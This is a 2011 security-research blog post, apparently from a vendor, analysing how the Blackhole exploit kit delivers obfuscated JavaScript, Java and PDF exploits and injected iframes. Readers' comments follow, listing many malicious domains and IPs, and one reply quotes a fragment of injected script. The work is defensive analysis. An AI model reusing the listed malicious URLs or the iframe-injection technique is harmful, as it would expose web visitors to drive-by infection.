Friday, February 11, 2011

Blackhole exploits kit attack growing

Recently, we have seen an increase in Blackhole exploit kit attacks. Blackhole is yet another web exploit kit developed by Russian hackers. According to one forum, the author indicates that the kit will cost $1,500 annually, $1,000 for a half-year and $700 for 3 months. It is a very powerful kit with a number of recent exploits including Java and Adobe PDF exploits. The attacker has continually improved the kit with more obfuscation and crypto algorithms to avoid the detection by AV vendors. One of the lines from description of the kit says it all - “Exploits crypt on special algorithms that make it impossible to code analysis and detection of anti-virus as well as services,Tipo wepawet and other counterparts ...”. Analysis of this malicious toolkit showed that URL patterns remain the same for most of the malicious domains hosting the Blackhole exploit kit. A Google search for the URL patterns returns thousands of results for such domains and Google does generally flag them as malicious domains. Here is the screenshot of Google search:

The exploit kit sends heavily obfuscated JavaScript code with Java applet code, which will download a malicious JAR file to the system. Here is what the code looks like:

The above JavaScript code is formatted for better viewing. It is heavily obfuscated to avoid antivirus detection. If we decode the content, we see that the kit is targeting a recent vulnerability in Java. The VirusTotal result for above “.jar” file is very poor with only 2 antivirus engines triggering on it. Here is the decoded part of the script,

The above decoded JavaScript targets CVE-2009-1671. It will download a malicious binary called “info.exe” from the server and execute it on the system. The VirusTotal result for this file remains poor at only 47%. There is also another Iframe attack in the decoded JavaScript code.

The above code will append the malicious Iframe to the body of the webpage, which points to another malicious URL. The above malicious URL contains yet another malicious URL in an ASX file format. This is intentionally done to avoid a user prompt. Here is the source,

This URL then sends more obfuscated JavaScript code exactly like the second image of the blog. Once decoded it shows JavaScript code which targets CVE-2010-1885. Here is the decoded script,


We have seen many similar web exploits kits in the past and attackers are coming up with new ones like Blackhole with more features and reliable and undetectable exploits all the time. We are also seeing large number of malicious domains hosting Blackhole exploits kit. The detection ratio is generally very poor for malicious binaries contained in the kits. Even though the price of this exploit kit is high, it remains a sought after commodity.

Umesh

114 comments:

Anonymous said...

I was using chrome, viewing a popular UK website about celebrity news and the blackhole kit exploit was blocked by AVG. What damage could be done by this threat and why is it on a popular website or in chrome?

Umesh Wanve said...

That's good that threat is blocked by your Antivirus. The damage can be like compromising your system, stealing your confidential data etc. If you remember the website address, please email to me uwanve@zscaler.com for further analysis.

Adam said...

i got pop up while using chrom also, but this was when i was trying to access my emails on hotmail, the webpage didnt even connect the pop up appeared and said page couldnt be found

Anonymous said...

Hi, same Anonymous as before. I just got the AVG blackhole exploit kit warning from using hotmail, so I am worried that I may well be infected from my own PC, not an outside website. Do you think Chrome could be the issue? Internet Explorer can be slow, but if it's safer... I'd pick the tortoise over the hare everytime.

Anonymous said...

Different person. I use IE and just received a "AVG Blocked" message while using hotmail. Never seen this before and was receiving a text-to-email from someones cellphone.

Anonymous said...

This Morning I got a pop up from AVG saying it blocked BlackHole Exploit kit, it happened right after I logged into hot mail as well, I ran AVG and got no other signs of infection I also ran Malware Bytes and it came up negative

Umesh Wanve said...

@ all Anonymous
If the AVG triggered and blocked then you are safe. But I am curious to know all are getting pop up during hotmail. In such case please email the url, text or any other page details of the website where the AVG triggered to uwanve@zscaler.com

Anonymous said...

Also got pop up from AVG when on hotmail this morning..but came up only after opening up message from one of those companies that offers coupons for a deal of the day.

Anonymous said...

I've had a message that AVG has blocked Exploit blackhole exploit kit (1883) happen whilst on Hotmail this Sunday and last sunday. To be honest, I am a bit concerned as my Hotmail account was recently hacked and proceeded to spam all my friends and then delete my contacts list.

Anonymous said...

i got it while playing "snowball fight" on facebook...never seen it before today....AVG 2011 blocked it

Anonymous said...

My first post here: It's happened twice on my computer. The first time was two days ago and then again today. Both times I was in Hotmail (seems to be a theme).
AVG blocked it and locked up my browser (IE). Full scans found nothing. The first time I clicked on "further info about this threat" in the AVG warning and tried searching their library with their suggestions in the warning but found nothing. Next time I'll save the long url they suggested in their warning and post here. BTW, my original warnings called it "Type 1384" but later it seemed to be labeled "Typw 1889"....I think...

Umesh Wanve said...

@ All.

thanks for passing the emails. Most of you have been protected by AVG and the mentioned URL's are hosting Blackhole exploits.

Anonymous said...

I am new to this stuff so can you please help me and tell what tool/technique you used to deobfuscate this javascript.

Umesh Wanve said...

@ Anonymous

I mostly use Malzilla a good tool to decode the JavaScript. Sometimes I do manual analysis as well. We do have some internal frameworks for de-obfuscating the contents. Use malzilla for better understanding.

Anonymous said...

from a new "anonymous":

I keep having this Blackhole Exploit warning coming up from AVG (blocked by AVG) on this URL:

http://hubpages.com/forum/topic/13065?page=2

The AVG warning also contains the following info:

"URL: mld.co.cc/index.php?tp=7903472c292fded4

Name: Blackhole Exploit Kit (type 1889)"

kelliemurray said...

I just got the same blocked threat from AVG while on the homepage of facebook.

Anonymous said...

Can it be found by McAffee?

Anonymous said...

Original Anonymous back,

I uninstalled Chrome after my last post and NO blackhole exploit warnings from AVG since. I tried IE9 yesterday WHICH SUCKS, so have moved to Mozilla Firefox and like it. I think AVG and Chrome came into conflict somehow, but I believe this is a chrome communication error that AVG thinks is malicious... Just an unfounded suggestion.

Umesh Wanve said...

@ Anonymous

I am not sure about Mcafee.

Umesh Wanve said...

@ Original Anonymous
It may not be issue with Chrome and AVG rather you must be came across infected site and AVG triggered on it. Firefox and Chrome can sometimes warn you about the malicious sites while browsing.

Anonymous said...

I got the same message whilst visiting a cricket stream at crictime.com

Anonymous said...

From another anonymous

Here's another link that AVG will block with the warning of a Blackhole Exploit Kit.

http://sephoracoupons.co.cc/c308

Anonymous said...

129.121.32.26/home/index.php

was while I went to a website called joecanuck and entered their forums.

avg blocked and it was called exploit blackhole exploit kit (type 1889)

Only site I have seen it on from my usual web browsing.

Steve Kennedy said...

My AVG 2011 just blocked "Exploit Blackhole Exploit Kit" (plus a type number that I forget) at this site:

www.worldfest.org

This is the website for the upcoming Houston International Film Festival, which should get lots of visits.

Steve Kennedy
Deer Park, TX

Anonymous said...

Hi, I use IE7, gmail, and AVG (for your FYI and stats).

Clicked link within email going to WebMD

URL visited: http://forums.webmd.com/3/neurology-general-neurology-questions-and-support/forum/89?@guest@
Exploit error occurred right after an ad loaded for "Culturelle" on left side-bar.

I had to close top warning box in order to maximize the page; I didn't copy the first warning which sat atop the 2nd warning.

2nd warning was---
AVG Surf-Shield message directed to "follow one of the suggestions below to continue:
URL: roge2.cx.cc/index.php?tp=120d964da3a16988
Name: Blackhole Exploit Kit (type 1384)

Have bmp screenshot if you want it.

Tried mailing customer service for WebMD - mail returned.

Anonymous said...

I think you guys shouldnt get on hot mail it seems like nothing but trouble get on yahoo instead

Umesh Wanve said...

@ Steve Kennedy

Thanks for passing the link. Worldfest was infected with malicious contents. I posted a blog about it. Worldfest removed the bad code after the blog.

Umesh Wanve said...

@ Anonymous
The site exactly looks like blackhole exploit site. roge2.cx.cc/index.php?tp=120d964da3a16988

AVG blocked it for you.

Anonymous said...

Hi,
Just call me AnonymousD.
I just got the same AVG threat blocked message from a site our company previously designed, the file infected was global.js. The code I pulled out of the js was:

[couldn't post, too long]

Well, it probably won't let me post it all, but hopefully the mod can see it.
It was infected at 8:20am on Apr 8th, 2011.

TY and GL
-D

Zadora said...

Send me an email Umesh, and I can send you the entire js file, if you're interested.

-D

cyber said...

Hi..

I wasn't using Chrome, I was using Firefox..

And it was on a famous website..: deviantART (dA).. So I don't understand... ... But yesterday, while I was doing a research on Google, I clicked on lots of unknown websites... And that research was the last think I did before I turned off the computer.. And today, 10 minutes after having my computer on, this threat appears.. I don't know if it's related somehow.. I don't understand anything about viruses..

The specific URL was..: http://www.deviantart.com/#/d3dmt2v

Anonymous said...

Using Firefox and doing a google search then clicking on the websites in my search I've come across 4 Blackhole alerts :/
Managed to get the URL of one of them:
http://coralreff.cz.cc/QQkFBwQEDAUHDQMHEkcJBQcEBgIGBQAEBA==

Is there any way to fix this or use an antivirus so it doesn't happen again?

Thanks
-A

Anonymous said...

Category: Intrusion Prevention
Date & Time,Risk,Activity,Status,Recommended Action,Risk Name,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description
4/13/2011 6:59 AM,High,An intrusion attempt by 0s1.cz.cc was blocked.,Blocked,No Action Required,Web Attack: Blackhole Toolkit Website,"0s1.cz.cc.This was blocked by norton after looking at article on yahoo.

Anonymous said...

Hey,

Was using hotmail once and got the message, the other time was when looking up images ('im a gfx artist) and do work on forums for people. AVG blocked the blackhole hit while ont his image on imageshack I believe. I looked and it said it was located in my programfiles (Internet Explorer)
I'm currently using EI9, so this isn't a good sign.

susieq said...

i got the exploit blackhole exploit kit pop up while on facebook and use firefox 4.0

susieq said...

i got the exploit blackole exploit kit popup from avg while on facebook and using firefox 4.0

Movie Torrents said...

why does all these comments only have detection by AVG?

Umesh Wanve said...

@ Movie Torrents

Most of them are using free AVG version and it is able to block large number of blackhole exploits.

Umesh Wanve said...

@ susieq

Please be sure which pages are opened while AVG popup and email me any URL's you found suspicious. You will find my email in the comments

Anonymous said...

Getting blackhole exploit kit attack (2008) from:

mongth.com/main.php?a=3b627d63efed55ba

cablab7 said...

URL: aaarrr22.cz.cc/index.php?tp=592e406c7cea87e8
Name: Blackhole Exploit Kit (type 2008)

cablab7 said...

URL: aaarrr22.cz.cc/index.php?tp=592e406c7cea87e8
Name: Blackhole Exploit Kit (type 2008)

steve K said...

I am using IE 8 and got the warning Blackhole Exploit Kit
At MSN/fox sports. Aperantly
AVG blocked it.
Steve

Anonymous said...

since yesterday that is April 24th i 'm getting a LOTS of blackhole kit exploits type 2005, 2008 etc. i am getting such threat while reading yahoo news, searching with google, i see incomplete webpages without proper page layout just some scattered text, i 'm using IE9 and Firefox4. Although AVG is able to protect but since yesterday April 24th or 23rd i have seen unusual number of attacks. feels odd why all of a sudden i 'm getting such virus threats. sometimes i need to reload webpage several times to see it and sometimes it keeps showing, Connecting........ why the webpages didnt load up at once ? why they take several reloads before being properly load up ? why it keeps saying Connecting Connecting and then " The connection has timed out " ?? i got this error several times.

Anonymous said...

yes i m getting a lot of threats whether i use firefox4 or ie9. specially google search showing lots of blackhole exploits. like this one.
http://www.google.com.pk/search?q=chinese+chana+pickup&hl=en&client=firefox-a&hs=OYL&rls=org.mozilla:en-US:official&prmd=ivns&source=lnms&tbm=isch&ei=eWW1TZrnOofKrAeN7tjIDQ&sa=X&oi=mode_link&ct=mode&cd=2&ved=0CA4Q_AUoAQ&biw=1100&bih=625

Umesh Wanve said...

@ Latest Anonymous

Can you remember exact URL's visited? Can you take some screenshots of webpage and AVG popup? If possible please collect all possible data and email to me for further analysis. I can be reached at uwanve@zscaler.com

Umesh Wanve said...

@ steve K

Can you email me the exact URL and possibly screenshot?

Anonymous said...

xen said...

Hey using FF 4.0. and got "Blackhole kit Exploit (type 2005)" at www.darklyrics.com.

I use this site all the time and I have not gotten any warnings from AVG there(I'm using AVG).

I haven't gotten it anywhere else just here so far.

Anonymous said...

hi i had AVG popping up every 10 or so seconds just now saying this:

Threat blocked from: citymartonline - Threat type: Exploit Blackhole Exploit Kit.

ive never been on that site and i didnt find much when i googled it either. help pls? :)

Gillsing said...

Today http://steakfacegames.com/ appears to be afflicted with some code that wants to download a file and open a pdf-document. Another visitor said that their AVG had called it a blackhole exploit. The main page has also been reported, but that warning doesn't seem to work when a game is linked directly, though that's when I encountered the problems.

D. Doe said...

norton popped up with a warning that it had detected a intrusion attempt from headoo.cz.cc193.105.154.235,80
and blocked it.

Anonymous said...

Norton just detected an intrusion attempt on my PC 15 minutes ago.

I use Mozilla and Norton's report says:

Web Attack: Blackhole Toolkit Website.

Attacking Computer
buop5.cz.cc (194.247.183.130.80).

Attacker URL
buop5.cz.cc/forum.php?tp=76d7830c46e88231.

Anonymous said...

I am using Firefox 4.0.1. Twice now AVG has blocked access on msnbc's home page. The first time a couple of weeks ago, and just now, May 4, 8:20pm cst.

merlin96 said...

I got blocked by Norton from the Malicious Toolkit 9. The address both times in a matter of minutes that it happened was 193.105.154.236. I hope because I was blocked that my computer is o.k. This also happened to me this morning.

merlin96 said...

I also wanted to say that two earlier attempts were made from the same address - 193.105.154.236 -- earlier this morning. I wanted to check the address to make sure it was the same before posting. In both cases with these blocked attempts of the "malicious toolkit website 9" virus, they happened 4 minutes apart. It makes me nervous that there is some vulnerability in my computer - something left open in my firewall - although thankfully my antivirus software caught it. I am doing a full scan now but so far, it has found nothing but the usual cookies.

Ann said...

Use Firefox and AVG Free. Got blocked on site http://www.helwigcarbon.com/ the Spanish version.
URL: peru-pcb.com/jquery.js
Name: Blackhole Exploit Kit (tpe 2014)

Anonymous said...

Hi, am getting continuous blackhole exploit kits which were blocked by AVG, for different websites. AVG says the url is www.google-analytics.com/ga.js
Can you tell me why this is happening as it is very frequent

Rob said...

As others have mentioned. I just got it on chrome while on my hotmail. Avg picked it up and blocked it.

merlin96 said...

Here I am again - this time received block by Norton from address 79.170.40.36 -- Malicious Toolkit Iframe Injection. I was on jewelrymaking.allinfoabout. Don't know why I seem to keep getting attacked on all these different sites, although thankfully my AV software has picked it up to date. (BTW I use IE7 and was using Google browser). Could there nonetheless be something hidden in my harddrive that a scan hasn't picked up - can anyone answer this question?

Anonymous said...

Ive had this twice in two days - one is a site I know (belongs to a friend of mine) & the other was following a google image search for a wardrobe! AVG 2011 blocked it both times.

adin said...

Any recommended tools/cleanup procedures for sites that have had the iframe injected? Using server-side tools like clamAV and rkhunter we haven't been able to find anything (after a few users reported blackhole alerts)

What attack vector is this exploit using on servers?

Umesh Wanve said...

@ adin

Generally don't rely on Antivirus. You will have to check out for source pages for possible bad code manually. Attackers can inject malicious code by taking advantages of known/unknown vulnerabilities or also they can modify pages by stealing FTP passwords.

[ U j ] said...

Hey, I got same msg on my AVG 2011 and it blocked around 4-5 Blackhole Exploit kit (type 2022) But unfortunately yesterday i lost my gmail, hotmail, Alertpay accounts. But thanks to recovery option available there, i recovered everything in 10minutes. But hacker did put his email in email forwarding option. So this threat/virus is very dangerous in stealing your information.

Did anyone else noticed, why only AVG members getting this? i scanned PC with AVG, no virus found.. i uninstalled it completely and installed Avira and it caught 48 virsus on my PC. I think in paid, Kaspersky internet security is better option over AVG Internet security. And in freebies, i think Avira did the best job.

merlin96 said...

In respone to the last post and the question - "why do only AVG members get this" - I'm not very tech savvy, but if I'm understanding your question correctly, then let me answer that to say they don't. I use Norton AV software and have also gotten a number of blocked attempts. (See my several posts above.) I'm wondering if it has to do with the browser I'm using and thus, wondering what browser others are using. I'm using the older IE7 and recently got an email from Paypal that I should update because there have been a lot of security issues with the browser I'm using. Howeber, when I updated to IE9, I hated it so much I immediately uninstalled it and am now trying to decide why to do next - maybe Mozilla Firefox? Anway, it's not just AVG users who are getting these messages and attempted attacks.

Richard Harlos said...

I just sent you an email with the URL where I got the AVG "Threat blocked" message for Blackhole. That URL, if anyone else is interested, is http://freewowguide.org/wow-death-knight-guide-talents-specs-and-rotations-for-patch-4-0-1/ and just yesterday I visited and got no AVG block.

I use Chrome v12.0.742.100, run on Win7 64bit, and only yesterday applied all of the several latest Windows Updates as well as the latest Adobe Reader (not sure of version) and Java updates (v26 if memory serves).

Thank you for your informative posts & helpful attitude here :)

Shiny said...

Shiny,
As with loads of others I rarely use my internet but when I get the backhole toolkit blocked by Norton... you guessed it HOTMAIL. The message I recieve is:
Backhole Toolkit Wbsite.
hercules.co.be (193.105.154.239, 80)
hercules.co.be/index.php?tp=39f5373c9a2e07df
source address 193.105.154.239
this is the source address not the destination address so it's not something on my pc as mine destination address is not the source address.
Note reads, network traffic FROM hercules.co.be matches the signature of a known attack. The attack was a result from \device\harddiskvolume1\program files\internet explorer\iexplore.exe
I use very little on the internet as keep getting this but only on Hotmail.

Rob Marshall said...

Here is a reputable French website which AVG is also blocking due to blackhole kit detection (2014) http://www.mc-conseil.fr/

Should I try to let thme know their site is compromised?

Rob Marshall said...

Here is a reputable French website which is also being blocked by AVG due to |BlackHole Exploit Kit (2014) detection.
http://www.mc-conseil.fr/
Should I try to let them know their site is compromised?

Umesh Wanve said...

@ Rob Marshall

It is also blocked by Google Safe Browsing. Yes. you can email them about infection

Anonymous said...

....I was attacked (but AVG saved me) by a misspelling of the site memegenerator.net:

The exploit site was memegenrator.net....

Anonymous said...

AVG just blocked a Blackhole exploit Kit at the URL:

www.slavemissi.com

Anonymous said...

My site about cheap web hosting which can be found at http://best-inexpensive-web-hosting.com was also attacked by this blackhole. My web host is currently restoring the backup of one week ago. Hope it helps!

HN said...

I get an avg block at flying-web.net

theturtleblues said...

Hey need some advice. Got hit with a trojan virus called Exploit Blackhole Exploit Kit. I tried following step-by-step removals online but ended up not even being able to start windows. I formatted the drive, but it's still not gone. I downloaded AVG and Malwarebytes which seems to be stopping any actions the virus is trying to take. Malwarebytes identified it and said it removed it successfully. Windows wouldn't start again upon reboot, but started after shutting down one more time. Upon startup, all my antivirus software was gone and I had to reinstall. Now none of the programs are identifying that there even is a trojan, but Malwarebytes is still continuously blocking malicious sites that are trying to open.

I am too inexperienced to really know what I'm doing if I try to remove it manually. Any recommendations on how to remedy this?

Anonymous said...

When you google "Charice shuts down Oprah with powerful performances" and visit the URL of the first website at the top of the search results an AVG window popped up.

I was on Firefox 7.0.1 with AVG free (version 2012.0.1831) which blocked the Blackhole Exploit Kit (type 1889)
with File name: edthosting.ce.ms/main.php?page=64a30cd969b37792

Clicking on "More Info" link provided by AVG comes up with nothing more about this threat.

Ricchard Grant said...

hello, can you help me please. we run a business, via www.k9help.net which is now being blocked by the "malicious toolkit website 9". I have abosulutely no idea how to remove this, who to contact to have the script removed, in fact no idea of what to do next. Could you please give me some help and advice, our business is being effected, not sure who else to ask.
Thank you, Richard Grant

Anonymous said...

Ive been getting hit with this exploit blackhole at the least 6 time a day....

ArticlesBullet said...

Thanks to the antivirus hackers can blocked now..

Anonymous said...

I was attempting to open a video required by my jazz history class when AVG alerted me of a Blackhole Exploit kit. I have read many of these comments and no one else has appeared to have been made aware of this threat as a result of a video. Could this mean that the virus has been developed to affect a larger variety of files since its conception? The file in question was a .php if that helps

Anonymous said...

I just got this while gaming on Facebook. The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: h4r29h.com/ai8r643.php
Name: Blackhole Exploit Kit (type 1889)

Anonymous said...

Hi, I was recently visiting a website called PSPISO and it came up with the blackhole exploit threat. Can i still visit this website ? or will i get the virus

nev said...

i tried to visit www.sulit.com.ph, a popular ebay-like website here in the philippines. chrome suggested not to continue because it has found the russian blackhole exploit kit:

aswaz.ddns.name

Umesh Wanve said...

@ Anonymous

If you got the alert, report this to site owner. And don't visit that site unless, they remove the bad code.

Umesh Wanve said...

@ nev

Thanks for the comment.But the site is opening in Chrome for me. I didn't find any bad code on that site. If you can recheck and post back, will be good.

Anonymous said...

I also got the threat blocked by AVG. the url i usually go to, which is saved in my firefox is im.chikka.cm.. the threath also say that the infected file is my firefox.exe? how is that possible if the threat does not always appear?

eric said...

im.chikka.com is also infected by blackhole exploit kit but was blocked by my avg buy not always being blocked. i got infected and got to reformat my drive c. i hope it will be the last time i re-format.

Anonymous said...

Using firefox and Windows XP

I am getting "type 1889", however I think this is just not a case of infected sites-there is some sort of browser hijack involved. Quite a few times I have pressed the back or forward buttons on Firefox and have then be hijacked to a site I have never seen before. Same for doing Google search: I click on a "reputable link" to wikipedia or what have you and get redirected.
However nothing is showing up with AVG or Spybot S&D

Anonymous said...

AVG blocked this Blk.Hole bullsh** for me while visiting my bookmark on firefox to a very useful site named allofcraigs.com. I wonder if it came from a listing or.. the site itself?

Anonymous said...

i'm using avg 2011 and comodo firewall avg popped up and said it caught blackhole but was not option to remove it. then thing popped up asking for administrative access. but if i don't accept it won't go away then i did accept and antivirus and firewall shut down. i shut down and did a system restore then scanned my system, avg found like 10 viruses 1/2 of which it can't remove so i moved to the vault malware found 6 viruses and windows defender found 4. i was usung a program paltalk. i think it maybe a direct thing from paltalk. any ideas how to prevent this it happened 3 times already i thought the antivirus would help no such luck

Anonymous said...

I think it has been well-established that there is a problem - what is lacking in this thread is explicit information and methodology to resolve the problem. I'm no expert, however these attacks are so much of a drain that I'm thinking of becoming one. Here's my case so far ...

GIVEN:
index.php with no off-site includes
all files scan clean of nasty code
AVG Free scans clean on entire local PC

SYMPTOM: Exploit Blackhole

OBSERVATION: load page, watch msgs on status line/area, page APPEARS TO COMPLETELY LOAD, then more msgs appear reflecting access to unknown 3rd-party site. iFrame "clue" is near lower/left corner of page. View Page Source shows nothing, however right click on the "clue" and Inspect Element shows iFrame with the rogue link.

THE WEIRD BITS:
1) scan with Google Safe Browsing Diagnostic says the page is clean

2) quick check using FTP to view and download the page shows no defect - there is no iFrame/JS code, and the file has not been touched (and I mean that in the technical sense).

THEORY #1:
Clever bugger is hiding somewhere on the client side, compromising the browser(s) themselves. Firefox 5.0, Chrome 15.0.874.121, and for good measure IE 6.0.2900 which I am loathe to update.

Is there code (java?) that all three might use or call in performing their tasks?

THEORY #2:
Web page is f'kaked and I can't see it - furtive code, hidden characters, no idea really. Would need a simple reliable tool to scan the entire site - live and/or local
.
POSSIBLE SOLUTION:
This is where Zscaler and the rest of you chime in. We don't need many more testimonials, we need science of a computer type.

Anonymous said...

http://karkkilanseurakunta.fi

This domain is currently under the BlackHole Exploit.

Reported by Symantec Endpoint Protection when I was being cheated by a spam containing a link to this domain.

Remilee said...

I got the same thing on AVG when i logged in to CHIKKA MESSENGER.what could it do to my computer?please help!

MARIANNA said...

A WEEK AGO I DOWNLOADED PALTALK. I HAVE USED IT TWICE. BOTH TIMES NORTON NOTIFIED ME THAT IT BLOCKED A BLACKHOLE ATTACK FROM PALTALK MESSENGER. AM I IN DANGER? IS PALTALK SAFE? I HAVE TAKEN A SCREEN SHOT OF THE NORTON DETAILS ABOUT THE ATTACK AND I WAS GOING TO SEND IT TO YOU BUT I DONT KNOW HOW. PLEASE LET ME KNOW IF YOU NEED IT. CAN YOU PLEASE GIVE ME AS MUCH INFORMATION AS POSSIBLE AS TO WHETHER I AM SAFE USING PALTALK AND WHAT CAN I DO TO PREVENT GETTING INTRUDED FROM THE VIRUS. THANK YOU VERY MUCH, MARIANNA

Anonymous said...

Using IE9, accessing site www.slipstreamtv.com, useful for for sport veiwing, full of popups and adverts and must have clicked on one, Norton AV message "an intrusion attempt by 86.63.168.105 was blocked", more detail advised that it was a "Web Attack: Blackhole Exploit Kit Website 11", ip address traces to Latvia.

Anonymous said...

Is it safe to delete the info.exe files?

Anonymous said...

http://www.atimes.com/

Asia Times triggered it for me.

Enlightenment said...

I am a web developer and my site has come under attack. I have repeatedly removed the file(s). and it will go for weeks/months without any infections, then all of suddenly like clock work the virus will popup again.

How can you decode the obfuscated code?

I do have a copy of the code. If you want to see it.

How can a scan a linux machine for the malicious code.

Enlightenment said...

I am a web developer and my site has come under attack. I have repeatedly removed the file(s). and it will go for weeks/months without any infections, then all of suddenly like clock work the virus will popup again.

How can you decode the obfuscated code?

I do have a copy of the code. If you want to see it.

How can a scan a linux machine for the malicious code.

Julien Sobrier said...

@Enlightenment Umesh is not at Zscaler anymore. You can send me the code (please put it in ZIP file with password to not able blocked by the AV) to jsobrier @ zscaler.com. I'll analyze it and will send you more details.

Jallil_Vlos said...

I am using Firefox, and I've had AVG 2012 trigger and block this "Blackhole Exploits Kit" almost a dozen times. Seeing how I've had that blasted "Windows Security 2012" virus, I'm glad that AVG is doing it's job. So far, the Blackhole Exploits virus can't seem to bypass AVG.

I get on FB a lot, and don't do to much web browsing, but it looks like FB is the main culprit for me. I think it's been hacked (Yet again) as have numerous E-mail services. I would recommend to those of you who don't have AVG to get it ASAP. It's free, and it does it's job wonderfully!

Ben said...

Hi there
A number of users on our vBulletin forum at www.GT-Rider.com/thailand-motorcycle-forum/ are reporting "Blackhole exploits kit attacks."

Many reports list www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif as a problem, and/or another file in the images/statusicon/ directory. Neither GIF file exists... So far we've been unable to find anything on the site that appears to a genuine threat...

AVG is the only online checker that reports any issues at all...

Do you have any way to reliably srutinise our site? Its got both vBulletin forums and WordPress provides the outer CMS functions.

Kind regards
Ben
Webmaster / GT-Rider.com

Ben said...

Hi there
A number of users on our vBulletin forum at www.GT-Rider.com/thailand-motorcycle-forum/ are reporting "Blackhole exploits kit attacks."

Many reports list www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif as a problem, and/or another file in the images/statusicon/ directory. Neither GIF file exists... So far we've been unable to find anything on the site that appears to a genuine threat...

AVG is the only online checker that reports any issues at all...

Do you have any way to reliably srutinise our site? Its got both vBulletin forums and WordPress provides the outer CMS functions.

Kind regards
Ben
Webmaster / GT-Rider.com

Julien Sobrier said...

@ben hxxp://www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif contains a malicious piece of javascript in head: [script type='text/javascript']var a=!1;if(!document.cookie.match(...

it create an invisible iframe to http://prick.it.pn/in.cgi?2

Ben said...

Hi Julien
Thanks for your input -the problem is, I cannot find that "hxxp://www.gt-rider.com/thailand-motorcycle-forum/images/editor/smilie.gif" file in the site...

Using Smart FTP - cannot see the file
Using Cpanel File Manager - can't see it...

Any ideas on what to do next? :-)

We did found and removed the Blackhole exploit kit in WordPres. in JavaScript within the CF7 Calendar plugin.

Julien Sobrier said...

@Ben The page is a 404, meaning the file does not exist. The malicious code was inserted in the PHP template, or in the content stored in the database. You may want to look at the .htaccess files as well.

Anonymous said...

I log on to my space and BAM! BLACKHOLE POP UP. MY NORTON BLOCKED IT.

andy said...

I got this on my forum as well. AVG said it blocked dreifo.in/index.php?showtopic=307515

Peake said...

AVG warns me that blackhole exploit kit is here:

http://samslovick.com/occupy-la/lapd-police-violence-at-occupy-la-m-17-video/

Anonymous said...

Hello I have recently recived a blackhole exploit for the first very time in repeated session on Modzilla Firefox broswer it seem to happen on my e-mail and just when turning it on is there anyway to remove the exploits? or is this something my Anti-virus can just keep blocking? because it very sell seems like its blocking one or two at a time and increasing then decreasing I usually run virus scan every night this is nuts.

Anonymous said...

I got a blackhole exploit for the first time today on Firefox is there a way to remove the exploit? also thank god for AVG, This seemed to happen upon opening my hotmail and just starting the broswer up period, it as also recently stopped attacking however I'm worried more so when its lying dorment...

Anonymous said...

I was attacked by this link! how do I remove it? " ox-d.served-now.com/w/1.0/afr?auid=249042&cb=7494790648218637 " is there a way to remove the black hole exploits?

Anonymous said...

lol, half of these "Anonymous" people claiming they were abot to get infected from homtmail are trolls

Anonymous said...

SourceFire claims they have detected a new version of the blackhole kit. What can you tell me about this latest version in comparison to the older version?

Julien Sobrier said...

@Anonymizer: we have blogged about the new version of the Blackhole exploit kit at http://research.zscaler.com/2012/10/blackhole-exploit-kit-v2-on-rise.html